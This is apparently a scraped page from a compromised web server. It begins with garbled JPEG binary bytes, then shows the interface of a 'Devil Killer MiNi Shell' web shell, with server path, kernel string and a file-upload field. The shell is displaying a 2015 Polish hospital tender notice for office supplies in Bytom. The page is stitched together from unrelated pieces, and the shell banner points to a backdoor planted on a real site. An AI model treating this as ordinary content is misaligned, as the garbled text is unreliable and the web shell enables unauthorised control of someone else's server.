JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150219/37274-N-2015.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na dostawę papierów komputerowych, kopert, artykułów biurowych, płyt CD i DVD dla potrzeb Szpitala Specjalistycznego Nr 2 
w Bytomiu.  sprawie 5 / 5 PN / 2015</b><br>
<b>Numer ogłoszenia: 37274 - 2015; data zamieszczenia: 19.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 32 7861400, faks 32 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital2.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę papierów komputerowych, kopert, artykułów biurowych, płyt CD i DVD dla potrzeb Szpitala Specjalistycznego Nr 2 
w Bytomiu.  sprawie 5 / 5 PN / 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest zakup wraz z dostawą papierów komputerowych, kopert, artykułów biurowych, płyt CD i DVD dla potrzeb Szpitala Specjalistycznego Nr 2 w Bytomiu określonych przez Zamawiającego według grup asortymentowo - cenowych zgrupowanych w Pakietach nr 1 - 4 stanowiących załącznik A do SIWZ:
	Pakiet nr 1 Papiery komputerowe
	Pakiet nr 2 Koperty
	Pakiet nr 3 Artykuły biurowe
	Pakiet nr 4 Płyty CD, DVD.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.23.40.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium:
w przypadku złożenia oferty na wszystkie pakiety wadium w wysokości 3 400,00 PLN (słownie: trzy tysiące czterysta zł 00/100),
w przypadku złożenia oferty na:
Pakiet	wadium w PLN
Pakiet nr 1 Papiery komputerowe	500,00
Pakiet nr 2 Koperty	300,00
Pakiet nr 3 Artykuły biurowe	2300,00
Pakiet nr 4 Płyty CD, DVD	300,00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełnienia warunku: Wykonawca składa oświadczenia oraz dokumenty określone w § 18 ust. 1 SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia. Ocena spełnienia warunku: Wykonawca składa oświadczenia oraz dokumenty określone w § 18 ust. 2 SIWZ,
W celu potwierdzenia niezbędnej wiedzy i doświadczenia należy przedłożyć oświadczenie będące załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. zapewnią specjalistyczny transport przedmiotu zamówienia. Ocena spełnienia warunku: Wykonawca składa oświadczenia oraz dokumenty określone w § 18 ust. 4 SIWZ,
W celu potwierdzenia dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy przedłożyć oświadczenie dotyczące terminu 
i warunków dostawy wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. zapewnią specjalistyczny transport przedmiotu zamówienia. Ocena spełnienia warunku: Wykonawca składa oświadczenia oraz dokumenty określone w § 18 ust. 4 SIWZ,
W celu potwierdzenia dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy przedłożyć oświadczenie dotyczące terminu 
i warunków dostawy wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej, tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową zapewniającą wykonanie zamówienia przy założeniu, że zapłata za zrealizowane zamówienie nastąpi w terminie nie krótszym niż 30 dni od dnia otrzymania faktury, zapewni stałość cen w trakcie trwania umowy. Ocena spełnienia warunku: Wykonawca składa oświadczenia oraz dokumenty określone w § 18 ust. 3 SIWZ,
W zakresie potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy przedłożyć:
a)	oświadczenie będące załącznikiem nr 3 do SIWZ,
b)	oświadczenie dotyczącego stałości cen oraz warunków płatności będące załącznikiem nr 4 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym 
w SIWZ należy przedłożyć:
a)	Wypełniony załącznik nr 2 do SIWZ wraz z załączonym formularzem asortymentowo - cenowym (stanowiącym załącznik A do SIWZ) dla każdego oferowanego pakietu).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tj. Dz. U. z 2013r. 907 z późn. zm.) Zamawiający dopuszcza zmiany umowy po jej zawarciu w przypadku okoliczności, gdy:
a)	zmiana ta jest korzystna dla Zamawiającego,
b)	konieczność wprowadzenia zmian wyniknie z okoliczności obiektywnych, których nie można było przewidzieć w chwili zawarcia umowy, niezależnych od woli stron, bez względu na to czy ich skutki są korzystne dla Zamawiającego,
c)	strony umowy uznają zasadność wprowadzenia zmian do umowy, a zmiany te nie wywołają niekorzystnych skutków dla Zamawiającego i nie spowodują zmiany oferowanych warunków realizacji zamówienia będących podstawą oceny ofert.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital2.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu , ul. St. Batorego 15 
41-902 Bytom ( pokój nr.19. I piętro , Zam. Publiczne , Budynek Dyrekcji ) lub bezpłatnie na stronie internetowej szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2015 godzina 09:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu , ul. St. Batorego 15  41-902 Bytom ( pokój nr.2 ,  parter , Kancelaria Głowna , Budynek Dyrekcji ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 Papiery komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1 Papiery komputerowe
1.	Papier komputerowy samokopiujący składanka 240mmx12     2-warstwowy z odrywaną perforacją	op.	4
2.	Papier komputerowy samokopiujący składanka 240mmx12    2-warstwowy z odrywaną perforacją, kolorowa kopia, 	op.	50
3.	Papier komputerowy składanka  375 L	op.	4
4.	Papier komputerowy składanka 240mmx12 1-warstwowy z odrywaną perforacją, biały	op.	4
5.	Papier  samokopiujący składanka  2-warstwowy z odrywaną perforacją  Rejestr Usług Medycznych do systemu komputerowego Start do drukarek igłowych 	op.	440.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 Koperty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2 Koperty
1.	Koperty białe samoprzylepne 114x162 C6 op. 500 szt	op.	20
2.	Koperty białe samoprzylepne 162x229 C5 op. 500 szt	op.	10
3.	Koperty brązowe zaklejane na mokro 229x324 C4 op. 500 szt.	op.	100
4.	Koperty brązowe zaklejane na mokro 162x229 C5 op. 500 szt	op.	60
5.	Koperty białe samoprzylepne 229x324 C4 op. 250 szt	op.	20
6.	Koperty na CD 127x127 op. 100 szt	op	200
7.	Koperty brązowe B5 176x250 op. 500 szt.	op	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3 Artykuły biurowe
1.	Blok milimetrowy A3	szt	6
2.	Blok milimetrowy A4	szt	4
3.	Bristol biały B 1 10 szt (100x70)	op. 	4
4.	Blok Techniczny A4	szt	40
5.	Brulion A4  96 str. kratka twarda okładka	szt.	240
6.	Datownik	szt	40
7.	Długopisy jednorazowe różne - automatyczne	szt	2000
8.	Dyskietki 3,5 1.44 MB 2HD op. 10 szt	op	6
9.	Dziennik korespondencyjny	szt	100
10.	Dziurkacz; dziurkuje co najmniej 20-25 kartek, średnica dziurek 5,5 mm ; odległość między dziurkami 80 mm	szt.	30
11.	Dziurkacz; dziurkuje co najmniej 50 kartek, średnica dziurek 5,5 mm ; odległość między dziurkami 80 mm	szt 	6
12.	Etykiety samoprzylepne A4 100 ark.  48,5x16,9 op	10
13.	Folia do laminowania 100 mikronów op. 100 szt. A4	op.	30
14.	Folia do laminowania 100 mikronów op. 100 szt. A5	op.	10
15.	Folia do laminowania 100 mikronów op. 100 szt. A3	op.	6
16.	Folia do faksu Panasonic KX-FP 121 1 op  a 2 szt	op	6
17.	Folia do drukarki laser 1 op  a 100 szt 	op 	6
18.	Folia do faksu Panasonic KX-FA 57 E 1 op a 2 szt	op	6
19.	Grzbiety do bindowania  10 mm op. 100szt	op.	6
20.	Grzbiety do bindowania  12 mm op. 100szt	op.	6
21.	Grzbiety do bindowania  18 mm op. 100szt	op.	6
22.	Grzbiety do bindowania  8 mm op. 100szt	op.	6
23.	Kalka maszynowa A4 op 25 arkuszy	op.	80
24.	Kalka ołówkowa A4 op 25 arkuszy	op.	80
25.	Karteczki samoprzylepne kolorowe 75x75 bloczek 100 kartek	op.	1000
26.	Kostka wkład kolor lub biały 	op.	60
27.	Klej  uniwersalny szkolno-biurowy tuba 40 ml 	szt.	100
28.	Klej w płynie 40 ml	szt.	100
29.	Klej w sztyfcie 30 g	szt.	120
30.	Klipsy do papieru 50 mm opak 12 szt	op	20
31.	Koszulki A5 op. 100 szt	op	16
32.	Kubki plastykowe białe 200ml z atestem PHZ  op. 100 szt	op	60
33.	Marker do opisywania bielizny wodoodporny,  czarny 	szt.	1600
34.	Marker czerwony 	szt.	400
35.	Marker do opisywania sprzętu wodoodporny, olejowy,  czarny 	szt	40
36.	Marker do szkła cienki, czarny, 1,3 - 1,5mm	szt	500
37.	Mazak czarny	szt.	800
38.	Mazak czerwony	szt	400
39.	Naklejki na segregator 1 op  a 10 szt 	op	100
40.	Nawilżacz glicerynowy (poj. ok. 20 ml )	szt	40
41.	Notatnik szkolny A4  50 kartek, kratka, biały 	szt.	120
42.	Nożyczki 21 cm	szt	100
43.	Obwoluta A4 koszulka op. 100 szt	op	400
44.	Okładki do bindowania przód przezroczyste op. 100 szt	op	6
45.	Okładki do bindowania tył czarne op. 100 szt	op.	6
46.	Okładki do bindowania tył niebieskie op. 100 szt	op.	6
47.	Ołówki twardość HB.	szt	200
48.	Papier do faksu 210x6 rolka, 15 m	szt.	100
49.	Papier do faksu 216x6 rolka, 15 m	szt.	600
50.	Papier do faksu 216 - 30 m	rol 	60
51.	Papier termoczuły 110-20	rol 	60
52.	Papier termoczyły 57-20	rol 	60
53.	Papier kancelaryjny A4 kratka  pakowane  500arkuszy	op.	30
54.	Papier kancelaryjny A3 kratka pakowane po 500 arkuszy	op.	4
55.	Papier kolorowy A3 op. 500 ark  żółty, pastalowy	op	2
56.	Papier kolorowy A3 op. 500 ark. niebieski ( turkus ), pastelowy	op	2
57.	Papier kolorowy A3 op. 500 ark. różowy, pastelowy	op	2
58.	Papier kolorowy A4 op 100 ark. pastelowy	op	10
59.	Papier ksero A3 80g-m2 op. 500 ark. białość 146 CIE	op.	20
60.	Papier ksero A4 80g-m2 op. 500 ark. białość CIE 146	op.	4000
61.	Papier maszynowy A4 a 500 arkuszy	op.	60
62.	Papier pakowny szary - arkusze-	arkusze	100
63.	Papier przebitka A4 a 500szt.	op.	10
64.	Pinezki do tablicy korkowej	op.	30
65.	Pisaki do szła typ Sharpie - Ultra Fine Point	szt.	60
66.	Pisaki do szła typ Sharpie - Fine Point	szt.	60
67.	Poduszka do pieczątek, bez natuszowania wymiary ok. 55 x 80 mm	szt.	30
68.	Płyn korekcyjny biały rodzaj buteleczka, pojemnośc ok. 20 ml.	szt.	100
69.	Pudełka archiwizacyjne tekturowe wymiary wys. 35cm x 26,5cm x 10cm	szt.	3000
70.	Rolki  do kalkulatorów offsetowe 57mm-60m	szt 	100
71.	Rozszywacz	szt.	60
72.	Segregator A4 szerokość grzbietu 50 mm z dźwigniowym mechanizmem zamykającym , tekturowy powleczony folią polipropylenową, dolne krawędzie wzmocnione okuciami, na grzbiecie otwór na palec	szt.	200
73.	Segregator A4 szerokość grzbietu 75 mm z dźwigniowym mechanizmem zamykającym , tekturowy powleczony folią polipropylenową, dolne krawędzie wzmocnione okuciami, na grzbiecie otwór na palec	szt.	700
74.	Serwetki gastronomiczne	op.	200
75.	Skoroszyt  kartonowy hakowy połówkowy	szt.	2000
76.	Skoroszyt kartonowy hakowy pełny	szt.	1000
77.	Skoroszyt A4  z PP z bezbarwną przednią okładką wpinany do segregatora	szt	1000
78.	Skorowidz -alfabetyczny - A4	szt	20
79.	Skorowidz - alfabetyczny-A5	szt	20
80.	Spinacze biurowe 25mm, opak 100 szt.	op	1400
81.	Spinacze biurowe 50 mm op. 100 szt.	op	400
82.	Sznurek pakowy 3 dkg	szt	200
83.	Sznurek z tworzywa sztucznego poilpropylenowy 500g	szt	80
84.	Taśma biurowa klejąca 18-30	szt.	600
85.	Taśma dwustronna szerokość 38 mm, długość 5 m.	szt	120
86.	Taśma pakowa 5-6 cm długośc 50 m bieżących 6 szt.	op	40
87.	Teczka akt osobowych - skóropodobne tworzywo - twarda okładka	szt	200
88.	Teczka  do podpisu - grzbiet harmonikowy z kartonu pokryte skóropodobnym tworzywem - 15 k	szt	60
89.	Teczka  do podpisu - grzbiet harmonikowy z kartonu pokryte skóropodobnym tworzywem - min  20 k	szt	40
90.	Teczka z gumką	szt	600
91.	Teczki  wiązane A4  białe	szt.	4000
92.	Tusz do bielizny 50 ml, wytrzymały na wysoką temperaturą prania.	szt	4
93.	Tusz do pieczątek niebieski	szt.	160
94.	Tusz do pieczątek czarny	szt.	200
95.	Tusz do pieczątek fiolet	szt.	100
96.	Zakreślacz typu Point Office (rózne kolory)	szt	400
97.	Zeszyt A4  96 str. Kratka zwykła okładka	szt.	800
98.	Zeszyt A5  16 str. Kratka zwykła okładka	szt.	100
99.	Zeszyt A5  32 str. Kratka zwykła okładka	szt.	300
100.	Zeszyt A5  60 str. Kratka zwykła okładka	szt.	600
101.	Zeszyt A5 100 str. Kratka twarda okładka	szt.	40
